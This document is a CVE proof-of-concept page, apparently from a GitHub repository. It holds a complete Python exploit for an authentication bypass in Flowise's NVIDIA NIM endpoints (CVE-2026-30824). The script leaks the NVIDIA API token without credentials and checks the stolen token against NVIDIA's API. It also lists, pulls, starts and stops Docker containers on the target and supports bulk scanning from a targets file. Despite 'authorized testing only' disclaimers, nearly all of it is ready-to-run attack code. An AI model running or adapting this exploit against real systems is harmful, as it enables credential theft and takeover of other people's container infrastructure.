5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-30824.py PY
#!/usr/bin/env python3
"""
CVE-2026-30824 — Flowise NVIDIA NIM Authentication Bypass
Exploit for authorized penetration testing only.

Affects: Flowise < 3.0.13
CVSS: 9.8 (Critical)
CWE-306: Missing Authentication for Critical Function

The /api/v1/nvidia-nim/* path is whitelisted in the global auth middleware,
allowing unauthenticated access to container management and token generation.
"""

import requests
import json
import argparse
import sys
import time
from urllib.parse import urljoin

# ANSI SGR escape sequences used to colorize terminal output.
# Wrap text as f"{COLOR}...{RESET}" so the styling does not leak into
# whatever is printed next.
GREEN = "\033[92m"   # bright green  - positive findings
RED = "\033[91m"     # bright red    - errors
YELLOW = "\033[93m"  # bright yellow - warnings / negative findings
BLUE = "\033[94m"    # bright blue
RESET = "\033[0m"    # clear all attributes
BOLD = "\033[1m"     # bold / increased intensity


class FlowiseAuthBypass:
    """Unauthenticated client for the Flowise NVIDIA NIM endpoints (CVE-2026-30824).

    Each public method sends one request, without credentials, to a path under
    ``/api/v1/nvidia-nim/`` on the target, prints the outcome, and returns the
    decoded body (or ``None`` when the request failed). For authorized security
    testing only.

    Args:
        target: Base URL of the Flowise instance. A trailing slash is removed;
            any path prefix (e.g. ``http://host/flowise``) is preserved.
        verify_ssl: Whether the session verifies TLS certificates.
        timeout: Per-request timeout in seconds.
    """

    def __init__(self, target: str, verify_ssl: bool = False, timeout: int = 15):
        self.target = target.rstrip("/")
        self.verify_ssl = verify_ssl
        self.timeout = timeout
        self.session = requests.Session()
        self.session.verify = verify_ssl

    # ------------------------------------------------------------------
    # Internal helpers
    # ------------------------------------------------------------------

    def _build_url(self, path: str) -> str:
        """Return ``path`` appended to the target base URL.

        Plain concatenation is used instead of ``urljoin`` because joining an
        absolute path (``/api/...``) replaces the base URL's own path, which
        silently drops a reverse-proxy prefix such as ``/flowise``.
        """
        return f"{self.target}/{path.lstrip('/')}"

    @staticmethod
    def _is_html(text: str) -> bool:
        """Return True when ``text`` looks like an HTML document."""
        lowered = text.lower()
        return "<!doctype html" in lowered or "<html" in lowered

    @staticmethod
    def _is_error(resp) -> bool:
        """Return True when ``resp`` is the error dict produced by ``_request``.

        Only the type is checked: an exception with an empty message would
        otherwise be mistaken for a real response object.
        """
        return isinstance(resp, dict)

    def _request(self, method: str, path: str, data: dict = None, headers: dict = None):
        """Send an unauthenticated request to an NVIDIA NIM endpoint.

        Args:
            method: ``"GET"`` (case-insensitive) issues a GET; anything else
                issues a POST with ``data`` as the JSON body.
            path: Endpoint path relative to the target base URL.
            data: JSON payload for POST requests.
            headers: Extra headers merged over the default Content-Type.

        Returns:
            The ``requests`` response on success, or a dict of the form
            ``{"error": <message>, "status": 0}`` when the request raised.
        """
        url = self._build_url(path)
        req_headers = {"Content-Type": "application/json"}
        if headers:
            req_headers.update(headers)

        try:
            if method.upper() == "GET":
                resp = self.session.get(url, headers=req_headers, timeout=self.timeout)
            else:
                resp = self.session.post(url, headers=req_headers, json=data, timeout=self.timeout)
        except requests.exceptions.RequestException as e:
            return {"error": str(e), "status": 0}

        # An HTML body usually means a UI page or catch-all route answered
        # rather than the API handler, so warn the operator.
        if self._is_html(resp.text):
            print(f"{YELLOW}[!] Warning: Got HTML response from {path}{RESET}")
            print(f"{YELLOW}    This endpoint may not be an API endpoint{RESET}")

        return resp

    def _report(self, resp):
        """Print the status and body of ``resp`` and return the decoded body.

        Returns the parsed JSON when the body decodes, otherwise the raw text.
        ``ValueError`` is caught because it is the common base of the decode
        errors raised by both the stdlib ``json`` module and ``simplejson``.
        """
        print(f"[+] HTTP {resp.status_code}")
        try:
            data = resp.json()
        except ValueError:
            print(resp.text[:500])
            return resp.text
        print(json.dumps(data, indent=2))
        return data

    def _call(self, method: str, path: str, payload: dict = None):
        """Send one request and report it; return ``None`` on transport error."""
        resp = self._request(method, path, payload)
        if self._is_error(resp):
            print(f"[-] Error: {resp.get('error')}")
            return None
        return self._report(resp)

    # ------------------------------------------------------------------
    # Public API
    # ------------------------------------------------------------------

    def check_vulnerable(self) -> bool:
        """Probe ``/get-token`` and decide whether the endpoint is exposed.

        The target is reported as vulnerable only when the endpoint answers
        with a non-HTML response whose status is not 401, 403, 404 or 5xx.
        Connection failures, authentication/authorization rejections, missing
        endpoints, server errors and HTML pages all return ``False``.

        Returns:
            ``True`` when the target appears vulnerable, ``False`` otherwise.
        """
        resp = self._request("GET", "/api/v1/nvidia-nim/get-token")

        if self._is_error(resp):
            print(f"{RED}[-] Connection error: {resp.get('error')}{RESET}")
            return False

        status = resp.status_code
        if status == 401:
            print(f"{YELLOW}[-] Target returns 401 — likely patched (>= 3.0.13){RESET}")
            return False
        if status == 403:
            print(f"{YELLOW}[-] Target returns 403 — access to the endpoint is forbidden{RESET}")
            return False
        if status == 404:
            print(f"{YELLOW}[-] Endpoint not found — target may not be Flowise{RESET}")
            return False

        # 5xx errors (502, 503, etc.) indicate server issues, not vulnerability
        if status >= 500:
            print(f"{YELLOW}[-] Server error (HTTP {status}) — target may be down or misconfigured{RESET}")
            return False

        # A web page served for this path (e.g. a catch-all route) is not the
        # API answering; get_token() rejects the same response, so agree here.
        if self._is_html(resp.text):
            print(f"{YELLOW}[-] Got an HTML page instead of an API response — not treating target as vulnerable{RESET}")
            return False

        print(f"{GREEN}{BOLD}[+] Target appears VULNERABLE (HTTP {status}){RESET}")
        print(f"    Response: {resp.text[:300]}")
        return True

    def get_token(self):
        """Request the NVIDIA API token via GET /api/v1/nvidia-nim/get-token.

        Returns:
            The ``access_token`` string when present, the raw body text when
            a 200 response is not valid JSON, or ``None`` on any failure.
        """
        print("[*] Attempting to leak NVIDIA API token...")
        resp = self._request("GET", "/api/v1/nvidia-nim/get-token")

        if self._is_error(resp):
            print(f"[-] Error: {resp.get('error')}")
            return None

        # Check if we got HTML instead of JSON (endpoint may be wrong)
        if self._is_html(resp.text):
            print(f"{RED}[-] Got HTML response instead of JSON. Endpoint may not be accessible or vulnerability is patched.{RESET}")
            return None

        if resp.status_code != 200:
            print(f"[-] Failed. HTTP {resp.status_code}: {resp.text[:300]}")
            return None

        try:
            data = resp.json()
        except ValueError:
            print(f"[+] Raw response: {resp.text[:500]}")
            return resp.text

        # Do not announce success when the body carries no token.
        token = data.get("access_token") if isinstance(data, dict) else None
        if not token:
            print(f"{RED}[-] Response did not contain an access_token: {resp.text[:300]}{RESET}")
            return None

        print(f"{GREEN}[+] NVIDIA API Token: {token}{RESET}")
        print(f"[+] Token Type: {data.get('token_type')}")
        print(f"[+] Expires In: {data.get('expires_in')}s")
        return token

    def list_running_containers(self):
        """List running NIM containers. GET /api/v1/nvidia-nim/list-running-containers

        Returns the decoded JSON (or raw text), or ``None`` on a transport
        error or when an HTML page came back.
        """
        print("[*] Listing running containers...")
        resp = self._request("GET", "/api/v1/nvidia-nim/list-running-containers")

        if self._is_error(resp):
            print(f"[-] Error: {resp.get('error')}")
            return None

        # Check if we got HTML instead of JSON
        if self._is_html(resp.text):
            print(f"{RED}[-] Got HTML response instead of JSON{RESET}")
            return None

        return self._report(resp)

    def get_container(self, container_id: str):
        """Get container details. POST /api/v1/nvidia-nim/get-container"""
        print(f"[*] Getting container details: {container_id}")
        return self._call("POST", "/api/v1/nvidia-nim/get-container",
                          {"containerId": container_id})

    def get_image(self, image_id: str):
        """Get image details. POST /api/v1/nvidia-nim/get-image"""
        print(f"[*] Getting image details: {image_id}")
        return self._call("POST", "/api/v1/nvidia-nim/get-image",
                          {"imageId": image_id})

    def pull_image(self, image_tag: str, api_key: str = "test"):
        """Request an image pull. POST /api/v1/nvidia-nim/pull-image

        Args:
            image_tag: Image tag sent as ``imageTag``.
            api_key: Value sent as ``apiKey``.
        """
        print(f"[*] Pulling image: {image_tag}")
        return self._call("POST", "/api/v1/nvidia-nim/pull-image",
                          {"imageTag": image_tag, "apiKey": api_key})

    def start_container(self, image_tag: str, container_name: str = None,
                        gpus: str = "all", env: dict = None):
        """Request a container start. POST /api/v1/nvidia-nim/start-container

        Args:
            image_tag: Image tag sent as ``imageTag``.
            container_name: Optional ``containerName``; omitted when falsy.
            gpus: Optional ``gpus`` value; omitted when falsy.
            env: Optional ``env`` mapping; omitted when falsy.
        """
        payload = {"imageTag": image_tag}
        if container_name:
            payload["containerName"] = container_name
        if gpus:
            payload["gpus"] = gpus
        if env:
            payload["env"] = env

        print(f"[*] Starting container from image: {image_tag}")
        return self._call("POST", "/api/v1/nvidia-nim/start-container", payload)

    def stop_container(self, container_id: str):
        """Request a container stop. POST /api/v1/nvidia-nim/stop-container"""
        print(f"[*] Stopping container: {container_id}")
        return self._call("POST", "/api/v1/nvidia-nim/stop-container",
                          {"containerId": container_id})

    def preload(self):
        """Call the preload endpoint. GET /api/v1/nvidia-nim/preload

        Returns the raw response text, or ``None`` on a transport error.
        """
        print("[*] Triggering preload...")
        resp = self._request("GET", "/api/v1/nvidia-nim/preload")

        if self._is_error(resp):
            print(f"[-] Error: {resp.get('error')}")
            return None

        print(f"[+] HTTP {resp.status_code}")
        print(resp.text[:500])
        return resp.text

    def validate_token_against_nvidia(self, token: str):
        """Check ``token`` against NVIDIA's model-listing API.

        Uses a fresh ``requests.get`` (default TLS verification) rather than
        the target session, so the token is never sent over an unverified
        connection.

        Returns:
            ``True`` when NVIDIA answers HTTP 200, ``False`` otherwise.
        """
        print("[*] Validating token against NVIDIA API...")
        headers = {"Authorization": f"Bearer {token}"}
        try:
            resp = requests.get(
                "https://integrate.api.nvidia.com/v1/models",
                headers=headers, timeout=10
            )
        except requests.exceptions.RequestException as e:
            print(f"[-] Could not reach NVIDIA API: {e}")
            return False

        if resp.status_code != 200:
            print(f"[-] Token rejected by NVIDIA. HTTP {resp.status_code}")
            return False

        # Decode separately from the network call so a malformed body is not
        # misreported as a connectivity failure.
        try:
            data = resp.json()
        except ValueError:
            data = None
        models = data.get("data", []) if isinstance(data, dict) else []
        if not isinstance(models, list):
            models = []

        print(f"[+] Token VALID! Access to {len(models)} NVIDIA NIM models.")
        for m in models[:5]:
            print(f"    - {m.get('id') if isinstance(m, dict) else m}")
        return True


def _build_parser():
    """Build the command-line parser for the tool."""
    parser = argparse.ArgumentParser(
        description="CVE-2026-30824 — Flowise NVIDIA NIM Authentication Bypass Exploit",
        epilog="Authorized security testing only."
    )
    parser.add_argument("-t", "--target",
                        help="Target URL (e.g., http://192.168.1.100:3000)")
    parser.add_argument("-f", "--targets-file",
                        help="File with list of targets (one per line)")
    parser.add_argument("--check", action="store_true",
                        help="Only check if target is vulnerable")
    parser.add_argument("--scan-only", action="store_true",
                        help="Scan targets for vulnerability without prompts (useful for bulk scanning)")
    parser.add_argument("--get-token", action="store_true",
                        help="Leak NVIDIA API token")
    parser.add_argument("--validate-token", metavar="TOKEN",
                        help="Validate a leaked token against NVIDIA API")
    parser.add_argument("--list-containers", action="store_true",
                        help="List running containers")
    parser.add_argument("--get-container", metavar="CONTAINER_ID",
                        help="Get container details")
    parser.add_argument("--get-image", metavar="IMAGE_ID",
                        help="Get image details")
    parser.add_argument("--pull-image", metavar="IMAGE_TAG",
                        help="Pull a Docker image (e.g., nvcr.io/nvidia/nim:latest)")
    parser.add_argument("--start-container", metavar="IMAGE_TAG",
                        help="Start a container from an image tag")
    parser.add_argument("--container-name", default=None,
                        help="Name for the started container")
    parser.add_argument("--stop-container", metavar="CONTAINER_ID",
                        help="Stop a running container")
    parser.add_argument("--preload", action="store_true",
                        help="Trigger preload endpoint")
    parser.add_argument("--all", action="store_true",
                        help="Run all reconnaissance checks")
    parser.add_argument("--timeout", type=int, default=15,
                        help="Request timeout in seconds")
    # NOTE(review): --debug is accepted but nothing reads it yet.
    parser.add_argument("--debug", action="store_true",
                        help="Show request details and raw responses")
    return parser


def _print_summary(vulnerable_targets, patched_targets, error_targets):
    """Print the per-category target counts and lists at the end of a run."""
    print(f"\n{'='*60}")
    print(f"{BOLD}[*] Scan Summary{RESET}")
    print(f"{'='*60}")
    print(f"{GREEN}[+] VULNERABLE: {len(vulnerable_targets)}{RESET}")
    for target in vulnerable_targets:
        print(f"{GREEN}    ✓ {target}{RESET}")
    print(f"{YELLOW}[-] PATCHED: {len(patched_targets)}{RESET}")
    for target in patched_targets:
        print(f"{YELLOW}    ✗ {target}{RESET}")
    print(f"{RED}[!] ERRORS: {len(error_targets)}{RESET}")
    for target in error_targets:
        print(f"    ⚠ {target}")
    print(f"{'='*60}\n")


def main():
    """Command-line entry point.

    Parses arguments, builds the target list from ``--target`` or
    ``--targets-file``, probes each target, runs the selected action (or the
    full reconnaissance sequence when no action flag is given), and prints a
    summary. Exits with status 1 when no target is supplied or the targets
    file cannot be read.
    """
    parser = _build_parser()
    args = parser.parse_args()

    if not args.target and not args.targets_file:
        parser.print_help()
        sys.exit(1)

    # --target takes precedence; the file is only read when no single target
    # was given.
    targets = []
    if args.target:
        targets = [args.target]
    elif args.targets_file:
        try:
            with open(args.targets_file, 'r') as f:
                targets = [line.strip() for line in f if line.strip()]
        except IOError as e:
            print(f"[-] Error reading targets file: {e}")
            sys.exit(1)

    if not targets:
        print("[-] No targets provided")
        sys.exit(1)

    print("=" * 60)
    print("  CVE-2026-30824 — Flowise NVIDIA NIM Auth Bypass")
    print("  Authorized Penetration Testing Tool")
    print("=" * 60)
    print(f"\n[*] Processing {len(targets)} target(s)\n")

    vulnerable_targets = []
    patched_targets = []
    # NOTE(review): nothing appends to error_targets. check_vulnerable() only
    # returns a bool, so unreachable hosts are counted under "PATCHED" and the
    # summary always reports zero errors.
    error_targets = []

    # In --check / --scan-only mode only the probe runs and output stays compact.
    probe_only = args.scan_only or args.check
    single_target = len(targets) == 1

    for target_idx, target in enumerate(targets, 1):
        if not probe_only:
            print(f"\n{'='*60}")
        print(f"[*] Target {target_idx}/{len(targets)}: {target}")
        if not probe_only:
            print(f"{'='*60}\n")

        exploit = FlowiseAuthBypass(target, verify_ssl=False, timeout=args.timeout)

        if exploit.check_vulnerable():
            vulnerable_targets.append(target)
        elif probe_only:
            patched_targets.append(target)
        elif single_target:
            # Only ask for confirmation when there is a single target.
            response = input("\n[?] Continue anyway? (y/N): ").strip().lower()
            if response != "y":
                continue
        else:
            print("[-] Skipping this target")
            continue

        if probe_only:
            continue

        print()

        # Single-action modes: the first matching flag wins, in this order.
        if args.validate_token:
            exploit.validate_token_against_nvidia(args.validate_token)
        elif args.get_token:
            token = exploit.get_token()
            # Offer validation only in interactive single-target runs. (The
            # previous extra condition read an option the parser never
            # defined and raised AttributeError once a token was returned.)
            if token and single_target:
                link = input("\n[?] Validate token against NVIDIA API? (y/N): ").strip().lower()
                if link == "y":
                    exploit.validate_token_against_nvidia(token)
        elif args.list_containers:
            exploit.list_running_containers()
        elif args.get_container:
            exploit.get_container(args.get_container)
        elif args.get_image:
            exploit.get_image(args.get_image)
        elif args.pull_image:
            exploit.pull_image(args.pull_image)
        elif args.start_container:
            exploit.start_container(args.start_container, args.container_name)
        elif args.stop_container:
            exploit.stop_container(args.stop_container)
        elif args.preload:
            exploit.preload()
        else:
            # No action flag was given (with or without --all): run the full
            # reconnaissance sequence.
            print("[*] Running full reconnaissance...\n")

            # 1. Leak token
            token = exploit.get_token()
            print()

            # 2. List containers
            exploit.list_running_containers()
            print()

            # 3. Preload
            exploit.preload()
            print()

            # If we got a token, validate it
            if token:
                print("[*] Token obtained. Attempting NVIDIA API validation...")
                exploit.validate_token_against_nvidia(token)

            print("\n[*] Full reconnaissance complete for this target.")

    _print_summary(vulnerable_targets, patched_targets, error_targets)


# Run the CLI only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()